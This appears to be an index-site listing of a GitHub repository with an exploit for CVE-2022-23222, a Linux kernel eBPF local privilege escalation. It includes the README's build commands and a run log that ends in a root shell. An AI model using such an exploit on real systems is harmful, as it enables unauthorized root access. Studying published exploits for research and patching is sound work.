Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/tr3ee/CVE-2022-23222
CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation
https://github.com/tr3ee/CVE-2022-23222
Last synced: 3 months ago
JSON representation
CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation
- Host: GitHub
- URL: https://github.com/tr3ee/CVE-2022-23222
- Owner: tr3ee
- Created: 2022-06-07T03:20:23.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2022-06-07T03:41:13.000Z (over 2 years ago)
- Last Synced: 2024-04-24T14:15:15.782Z (6 months ago)
- Language: C
- Size: 13.7 KB
- Stars: 557
- Watchers: 7
- Forks: 95
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - tr3ee/CVE-2022-23222 - CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation (C)
README
# CVE-2022-23222
Chinese writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt
For educational/research purposes only. Use at your own risk.
## Build & Run
```bash
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
```